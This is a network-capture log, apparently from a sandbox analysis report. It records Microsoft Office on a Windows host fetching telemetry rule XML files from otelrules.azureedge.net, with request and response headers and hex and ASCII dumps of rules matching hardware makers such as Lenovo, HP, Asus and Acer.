                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        8192.168.2.54971713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:20 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: fa88b3fb-501e-0064-3f39-361f54000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142520Z-1749fc9bdbd4dqj6hC1DFWr4n400000002hg00000000k04g
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        9192.168.2.54971813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:21 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 42046764-d01e-0028-78a2-347896000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142521Z-r178fb8d765kzgrxhC1DFWrsuc00000002g000000000by1q
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        10192.168.2.54971913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:21 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 632
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 5ead3c92-b01e-0084-18a1-34d736000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142521Z-1749fc9bdbdqhv2phC1DFWvd3000000002k000000000d6a8
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        11192.168.2.54972013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:21 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 467
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6ba2b82c-f01e-0071-33a3-34431c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142521Z-1749fc9bdbdmg6wshC1DFWu2bc00000002s00000000094cb
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        12192.168.2.54972113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:21 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 933b6e18-c01e-0079-6ca0-34e51a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142521Z-1749fc9bdbdmg6wshC1DFWu2bc00000002tg000000005px3
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        13192.168.2.54972213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:21 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 3105e439-501e-0064-36ea-351f54000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142521Z-1749fc9bdbdqhv2phC1DFWvd3000000002gg00000000fsqh
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        14192.168.2.54972513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:22 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 764b3efa-d01e-007a-4391-36f38c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142522Z-r178fb8d765ljg7ghC1DFWfk4c00000002e000000000bzk0
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        15192.168.2.54972413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:22 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142522Z-16547b76f7fdf69shC1DFWcpd00000000kh000000000pfsg
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
